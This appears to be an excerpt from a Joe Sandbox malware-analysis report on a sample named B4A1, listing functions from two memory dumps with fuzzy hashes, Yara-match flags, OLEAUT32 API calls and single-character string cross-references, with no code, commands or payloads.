Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359

Function 024E56B7 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: dbdc451c0260bf6669b7d6396a94c1d949c1df6c310a867cd07ed3131d47c854
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4F11EC33A055D04DD7158E3C88005757FD30A9357DF99439AF4B99B2D2D7238D8B8751

Function 0042A700 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E

Function 024DA967 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a6bce38bb77cb855b0c1b2651f63ca23977da10de64c19d828eeec774b109c
Instruction ID: efb7329b8e8d831439480879050347e174e9cc1b42dcc820f3b40d361105fdd0
Opcode Fuzzy Hash: e4a6bce38bb77cb855b0c1b2651f63ca23977da10de64c19d828eeec774b109c
Instruction Fuzzy Hash: 3301D4F1A0071187DB219E1294D0B37B7AD6F91704F19087ED9495B300EB72E815CAA1

Function 00428D93 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95

Function 024D8FA0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6136a0a86494c0451f0a8cc20dd56009850612ffaa73c5348e62317f6daaf908
Instruction ID: 0dcaace11907e70670148787724b1bc6ceff57b2ffcf544b3a4b490ee8c008a8
Opcode Fuzzy Hash: 6136a0a86494c0451f0a8cc20dd56009850612ffaa73c5348e62317f6daaf908
Instruction Fuzzy Hash: 1BF0FEB2D006149FEF40EB98CC01EAE77B9AF0A320F080495F509BB260D622FD10CFA5

Function 0043CA93 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8

Function 00423086 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D

Function 024D32ED Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
Instruction ID: fe9e63b71fc3019a846d698e80f7a364f01656605a31852799541b28c21c9af1
Opcode Fuzzy Hash: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
Instruction Fuzzy Hash: 2EE0E575C11500EFEF007B16EC00A1C7AB3BB62303F46117AE409A3230EF325A2AEB59

Function 024D6E96 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
Instruction ID: 388abd9784b5f2ca9bc5a85261b371e1d0a67b3de6aa18f3af0ce90ccf7768fc
Opcode Fuzzy Hash: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
Instruction Fuzzy Hash: 22D05E66808973874F294E39A57023AA76F0A0755978F56A688C1BFB42DB26C84342D8

Function 00427AD3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E

Function 024D9F40 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
Instruction ID: 03e41e60379d97af8297f0ca95230cb5bb04341c97028444dafc6a8b0546fb56
Opcode Fuzzy Hash: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
Instruction Fuzzy Hash: 31D05E72D14244ABE9409B01DC41B6AB3FAFB5A714F041529B988B1060E622DA288B57

Function 0041C653 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E

Function 024CC8BA Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
Instruction ID: 28c10d4dceab537cfa8c72eda67ec4557f7ab9f185bb23dc1e89249cc4881af5
Opcode Fuzzy Hash: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
Instruction Fuzzy Hash: 0FD0127BF821008B9A099F11DD43B756A6397D770470CE1398905D3348EA3DD41A841E

Function 0040BFFD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 024BC264 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 024D7D1A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
Instruction ID: c6b40174b2523aaef5f2dd91474c0ee958df92780102c77510cf5e1b026b4a33
Opcode Fuzzy Hash: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
Instruction Fuzzy Hash: DDB002A5C46C10DB951A7F627D018EAB66A5D23301F842076D9062A211BA27DA2A49AF

Function 024D9AB5 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
Instruction ID: 16d4dadd4c274bc9991f285505161327d2ed430b0fc37758f4161f9dab7df972
Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
Instruction Fuzzy Hash: 20B012D0C04500C7D8009F206C00871A23C4A17210F003431C008EB101E131D400451D

Function 0042984F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E

Function 024E898E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
Instruction ID: 5f90c8482877ae364e78efe8602c82ba5110085f469652caa7ae2d3bb2038f17
Opcode Fuzzy Hash: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
Instruction Fuzzy Hash: AC900224D4D1008681508F449440470E279930B111F103410900CF3062C310D545455D

Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043179A

Strings

n, xrefs: 004318D1
O, xrefs: 0043187B
{, xrefs: 004318E1
G, xrefs: 004318A3
J, xrefs: 00431885
#, xrefs: 00431899
0, xrefs: 00431980
], xrefs: 00431849
~, xrefs: 004318C1
4, xrefs: 00431821
/, xrefs: 00431867
0, xrefs: 0043182B
B, xrefs: 0043188F
H, xrefs: 004318AD
;, xrefs: 00431817
, xrefs: 0043183F
B, xrefs: 00431871
m, xrefs: 004318B7
^, xrefs: 0043185D
Q, xrefs: 00431853

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

Function 024E197C Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 024E1A01

Strings

], xrefs: 024E1AB0
n, xrefs: 024E1B38
^, xrefs: 024E1AC4
0, xrefs: 024E1BE7
;, xrefs: 024E1A7E
G, xrefs: 024E1B0A
B, xrefs: 024E1AD8
~, xrefs: 024E1B28
{, xrefs: 024E1B48
Q, xrefs: 024E1ABA
/, xrefs: 024E1ACE
, xrefs: 024E1AA6
m, xrefs: 024E1B1E
#, xrefs: 024E1B00
4, xrefs: 024E1A88
O, xrefs: 024E1AE2
H, xrefs: 024E1B14
J, xrefs: 024E1AEC
B, xrefs: 024E1AF6
0, xrefs: 024E1A92

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: 7c4def737c090711aa91a497511ce28f7d57a05e78f21fbdc8375124e2224bc0
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 1C81076010CBC289D322C63C881875FBFD15BE7224F184B9DE1F94B3E6D6A58546C767

Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431360

Strings

~, xrefs: 00431487
{, xrefs: 004314A7
4, xrefs: 004313E7
, xrefs: 00431405
J, xrefs: 0043144B
m, xrefs: 0043147D
0, xrefs: 0043153F
B, xrefs: 00431437
], xrefs: 0043140F
G, xrefs: 00431469
0, xrefs: 004313F1
O, xrefs: 00431441
B, xrefs: 00431455
^, xrefs: 00431423
Q, xrefs: 00431419
#, xrefs: 0043145F
H, xrefs: 00431473
n, xrefs: 00431497
/, xrefs: 0043142D
;, xrefs: 004313DD

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 024E1538 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 024E15C7

Strings

/, xrefs: 024E1694
;, xrefs: 024E1644
0, xrefs: 024E17A6
~, xrefs: 024E16EE
], xrefs: 024E1676
n, xrefs: 024E16FE
^, xrefs: 024E168A
J, xrefs: 024E16B2
m, xrefs: 024E16E4
0, xrefs: 024E1658
, xrefs: 024E166C
{, xrefs: 024E170E
4, xrefs: 024E164E
G, xrefs: 024E16D0
#, xrefs: 024E16C6
Q, xrefs: 024E1680
B, xrefs: 024E169E
O, xrefs: 024E16A8
H, xrefs: 024E16DA
B, xrefs: 024E16BC

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: b069f18ffbce767ea764c82b3b6a9d2bdb7f34b1c63c73cba022d3f5d05080ed
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: C081F82010CBC289D326D63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042E9F6
VariantInit.OLEAUT32 ref: 0042EA05

Strings

Q, xrefs: 0042EA2C
-, xrefs: 0042EA94
W, xrefs: 0042EA34
2, xrefs: 0042EA68
4, xrefs: 0042EA70
*, xrefs: 0042EA88
., xrefs: 0042EA98
,, xrefs: 0042EA90
0, xrefs: 0042EA60
<, xrefs: 0042EA50
(, xrefs: 0042EA80
6, xrefs: 0042EA78
T, xrefs: 0042EA24
b, xrefs: 0042EA3C
8, xrefs: 0042EA40
:, xrefs: 0042EA48
>, xrefs: 0042EA58

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6

Function 024DEC54 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 024DEC5D
VariantInit.OLEAUT32 ref: 024DEC6C

Strings

4, xrefs: 024DECD7
b, xrefs: 024DECA3
6, xrefs: 024DECDF
Q, xrefs: 024DEC93
T, xrefs: 024DEC8B
<, xrefs: 024DECB7
2, xrefs: 024DECCF
., xrefs: 024DECFF
,, xrefs: 024DECF7
-, xrefs: 024DECFB
(, xrefs: 024DECE7
W, xrefs: 024DEC9B
8, xrefs: 024DECA7
*, xrefs: 024DECEF
:, xrefs: 024DECAF
>, xrefs: 024DECBF
0, xrefs: 024DECC7

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: b99dce0c0be6f12590e6b596e4ac8a846634e91449ea4caf96f8d4d71b5ff5ad
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 14410821108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51ACBA6

Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F83F
VariantInit.OLEAUT32 ref: 0042F84E

Strings

-, xrefs: 0042F8E3
T, xrefs: 0042F873
<, xrefs: 0042F89F
., xrefs: 0042F8E7
W, xrefs: 0042F883
b, xrefs: 0042F88B
6, xrefs: 0042F8C7
8, xrefs: 0042F88F
(, xrefs: 0042F8CF
,, xrefs: 0042F8DF
0, xrefs: 0042F8AF
>, xrefs: 0042F8A7
*, xrefs: 0042F8D7
Q, xrefs: 0042F87B
4, xrefs: 0042F8BF
:, xrefs: 0042F897
2, xrefs: 0042F8B7

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66

Function 024DFA9A Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 024DFAA6
VariantInit.OLEAUT32 ref: 024DFAB5

Strings

-, xrefs: 024DFB4A
6, xrefs: 024DFB2E
(, xrefs: 024DFB36
b, xrefs: 024DFAF2
2, xrefs: 024DFB1E
:, xrefs: 024DFAFE
0, xrefs: 024DFB16
., xrefs: 024DFB4E
T, xrefs: 024DFADA
,, xrefs: 024DFB46
*, xrefs: 024DFB3E
W, xrefs: 024DFAEA
4, xrefs: 024DFB26
<, xrefs: 024DFB06
>, xrefs: 024DFB0E
Q, xrefs: 024DFAE2
8, xrefs: 024DFAF6

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: d12d8a5ad0dabc967270bb620bfd471ffd4d158656c9cd78c21b76ed63f3a26c
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: AF41E820108BC1CED726CF3C8498616BFA16B66224F088ADDD8E54F3DBC375D51ACB66

Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043244F

Strings

L, xrefs: 004324BD
C, xrefs: 00432481
@, xrefs: 004324E5
E, xrefs: 00432495
e, xrefs: 004324B3
X, xrefs: 0043246D
A, xrefs: 004324EA
J, xrefs: 0043248B
[, xrefs: 004324C7
[, xrefs: 004324DB
@, xrefs: 004324A9
H, xrefs: 004324D1
X, xrefs: 00432477
Q, xrefs: 0043249F

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitVariant
